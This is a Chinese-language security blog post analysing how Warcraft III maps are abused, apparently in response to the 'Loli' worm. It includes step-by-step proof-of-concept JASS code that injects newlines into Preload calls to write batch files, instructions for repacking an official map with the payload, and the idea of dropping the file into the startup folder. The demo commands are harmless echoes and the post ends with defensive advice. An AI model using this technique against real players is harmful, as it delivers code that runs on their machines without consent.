War3地图“漏洞”分析介绍

0x00 前言


最近腾讯电脑管家团队对利用《魔兽争霸3》漏洞传播的“萝莉”蠕虫进行了分析,介绍了“萝莉”蠕虫的运行流程。接着该“蠕虫”的作者在其网站对此做了澄清,我们暂且不八卦这个事件,只在技术层面分析一下这个《魔兽争霸3》漏洞到底是什么,如何利用以及如何防御。

“萝莉”蠕虫分析地址:
http://www.freebuf.com/news/120136.html

“蠕虫”的作者博客地址:
https://blog.loxve.com/

0x01 简介


该《魔兽争霸3》漏洞的流程如下:

1.攻击者上传修改过的魔兽地图,等待其他玩家进入房间游戏

2.玩家进入房间后,由于本地没有该地图,所以会自动下载该地图

3.地图同步后,玩家进入游戏,触发地图中的脚本,该脚本在启动目录写入bat文件

4.玩家电脑重启后,启动目录中的bat文件被执行,成功加载payload

0x02 相关概念


JASS

是《魔兽争霸3》的脚本语言,用于控制地图的进程和行为, 是魔兽游戏和地图的基础

正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成JASS语言,保存在地图文件中,在游戏运行时被调用

HkeW3mModifier

是一个修改MPQ格式文件的工具,可用来修改加密过的mpq文件,带有强大的资源搜索功能,可以搜索出魔兽地图中大部分资源、重建列表,智能解压相关贴图

可用来查看和编辑地图中包含的文件资源

操作说明:

下载HkeW3mModifier.exe,选择地图,点击分析文件查看地图中包含的文件列表,如图

Alt text

其中,war3map.j包含地图的逻辑控制代码,右键解压war3map.j后可查看其中的代码,部分代码如图

Alt text

war3map.j中的文件结构

1、变量声明

声明了脚本文件中使用的全局变量
Lost Temple中的变量声明如下:

//***************************************************************************
//*
//*  Global Variables
//*
//***************************************************************************

globals
    // Generated
    trigger                 gg_trg_Melee_Initialization = null
endglobals

function InitGlobals takes nothing returns nothing
endfunction

2、触发器部分

声明了地图中使用的触发器

Lost Temple中的触发器部分如下:

//***************************************************************************
//*
//*  Triggers
//*
//***************************************************************************

//===========================================================================
// Trigger: Melee Initialization
//
// Default melee game initialization for all players
//===========================================================================
function Trig_Melee_Initialization_Actions takes nothing returns nothing
    call MeleeStartingVisibility(  )
    call MeleeStartingHeroLimit(  )
    call MeleeGrantHeroItems(  )
    call MeleeStartingResources(  )
    call MeleeClearExcessUnits(  )
    call MeleeStartingUnits(  )
    call MeleeStartingAI(  )
    call MeleeInitVictoryDefeat(  )
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    set gg_trg_Melee_Initialization = CreateTrigger(  )
    call TriggerAddAction( gg_trg_Melee_Initialization, function Trig_Melee_Initialization_Actions )
endfunction

//===========================================================================
function InitCustomTriggers takes nothing returns nothing
    call InitTrig_Melee_Initialization(  )
endfunction

//===========================================================================
function RunInitializationTriggers takes nothing returns nothing
    call ConditionalTriggerExecute( gg_trg_Melee_Initialization )
endfunction

根据函数名称能够猜出表示的意思

function Trig_Melee_Initialization_Actions为触发器进行的操作

function InitTrig_Melee_Initialization用来初始化

function InitCustomTriggers为用户自定义触发器的注册

function RunInitializationTriggers的功能是运行触发器

3、主函数main

脚本文件的入口

Lost Temple中的main部分如下:

//***************************************************************************
//*
//*  Main Initialization
//*
//***************************************************************************

//===========================================================================
function main takes nothing returns nothing
    call SetCameraBounds( -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), -7936.0 + GetCameraMargin(CAMERA_MARGIN_LEFT), 7680.0 - GetCameraMargin(CAMERA_MARGIN_TOP), 7936.0 - GetCameraMargin(CAMERA_MARGIN_RIGHT), -8192.0 + GetCameraMargin(CAMERA_MARGIN_BOTTOM) )
    call SetDayNightModels( "Environment\\DNC\\DNCLordaeron\\DNCLordaeronTerrain\\DNCLordaeronTerrain.mdl", "Environment\\DNC\\DNCLordaeron\\DNCLordaeronUnit\\DNCLordaeronUnit.mdl" )
    call NewSoundEnvironment( "Default" )
    call SetAmbientDaySound( "LordaeronSummerDay" )
    call SetAmbientNightSound( "LordaeronSummerNight" )
    call SetMapMusic( "Music", true, 0 )
    call CreateAllUnits(  )
    call InitBlizzard(  )
    call InitGlobals(  )
    call InitCustomTriggers(  )
    call RunInitializationTriggers(  )

endfunction

4、其他设置

如Unit Item Tables、Unit Creation、Players、Map Configuration暂略

0x03 Jass预读文件漏洞


Reference:

http://bbs.islga.org/forum.php?mod=viewthread&tid=48422&extra=page%3D1&page=1

JASS中三个特殊的函数:

  • native PreloadGenClear takes nothing returns nothing
  • native PreloadGenStart takes nothing returns nothing
  • native PreloadGenEnd takes string filename returns nothing

以上三个函数用来记录PreloadGenStart()和PreloadGenEnd()之间执行的所有Preload()语句,并将它们写入到PreloadGenEnd()函数指定的pld文件里去

注:

类似于输出日志文件

示例:

JASS代码如下:

function Test takes nothing returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload( "ReplaceableTextures \\CameraMasks\\White_mask.blp" )
    call PreloadGenEnd("c:\\test\\test.pld")
endfunction

执行函数Test()后,就会在c:\test\下新建文件test.pld,并写入如下内容:

function Test takes nothing returns nothing
    call Preload( "ReplaceableTextures \\CameraMasks\\White_mask.blp" )
    call PreloadEnd( 0.0 )
endfunction

漏洞原理

1、设置输出为bat文件

如果将输出的.pld文件后缀名改为.bat,那么文件中的每一行被当作一段代码被执行(当然语句无效,不符合批处理的语法),如图
Alt text

2、加入换行符\n

在批处理的语法中,\n代表换行。虽然.pld文件输出的每行内容格式固定,但是,如果通过\n把call Preload()这一行中的内容截断,那么就能够实现在新的一行显示一条可被执行的批处理命令

示例:

JASS代码如下:

function Test takes nothing returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\n@echo Test\n")
    call PreloadGenEnd("c:\\test\\test.bat")
endfunction

输出成test.bat后会包含换行符,输出的文件内容如下:

function Test takes nothing returns nothing
    call Preload( "
@echo Test
" )
    call PreloadEnd( 0.0 )
endfunction

此时,产生了新的一行代码@echo Test@echo Test得到执行,如图

Alt text

3、执行批处理

默认JASS只能做到输出文件,无法执行文件,所以只能将文件输出到文件启动项下,在重启后得到执行

0x04 实际测试


1、测试HelloGA2012.w3m

下载地址:

http://bbs.islga.org/forum.php?mod=viewthread&tid=48422&extra=page%3D1&page=1中的附件

war3版本:1.27.0.52240

加载地图HelloGA2012进入游戏后,按Esc键,如图,弹出提示,在D:\XX\下产生文件test.pld

Alt text
跳到目录D:\XX\,找到test.pld,内容如下:

function PreloadFiles takes nothing returns nothing

  call Preload( "
@cls
@color a
@echo Hello World
@echo This is a sample of WC3 map generated BAT file.
@echo Welcome to http://bbs.islga.org. Let's go 2012 with GA!
@pause
@exit
" )
  call PreloadEnd( 0.0 )

endfunction

测试成功

2、手动修改官方地图LostTemple

(1) 获得源文件

使用HkeW3mModifier打开官方地图(4)LostTemple.w3m,导出war3map.j

(2) 添加payload

根据上文对war3map.j中文件结构的分析,在function Trig_Melee_Initialization_Actions内添加如下代码:

call PreloadGenClear()
call PreloadGenStart()
call Preload("\n@echo Test\n")
call PreloadGenEnd("c:\\test\\test.bat")

如图

Alt text

(3) 保存

保存war3map.j后,在HkeW3mModifier选择替换(添加)文件,如图

Alt text

选择重压缩,保存地图文件,如图

Alt text

(4) 测试

将地图置于Maps文件夹下,进入游戏,地图被识别,如图

Alt text

注:
为便于测试,已将地图名称修改为Test;覆盖原地图,迷惑性更大

开始游戏,c:\test\下产生文件test.bat,内容如下:

function PreloadFiles takes nothing returns nothing

  call Preload( "
@echo Test
" )
  call PreloadEnd( 0.0 )

endfunction

如果将该文件输出到开机自启动目录,那么在重启后,文件将会执行

测试成功

0x05 补充


1、这个漏洞本身并不包含代码执行的功能,所以漏洞成功利用的关键在于找到一个执行代码的方法,最直接的方式为将文件输出到启动项中,当然,也可利用该漏洞实现对指定文件的修改

2、dota地图中war3map.j的位置为scripts\war3map.j,同样可以利用

0x06 小结


严格意义来讲,这个《魔兽争霸3》漏洞并不是一个漏洞,只是war3地图中支持一个输出文件的正常功能,利用这个功能,将精心构造的代码输出到特定位置,再配合其他方式来执行它。

所以该漏洞利用的关键在于执行的方式,通用方法无非就是写开机启动项。

对于普通用户来讲,注意本机的开机启动项目录就好,同时,杀毒软件也已经能够检测到该利用方式。

注意自我保护,谨防受骗上当。

适度游戏益脑,沉迷游戏伤身。


LEAVE A REPLY

正在加载中……

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器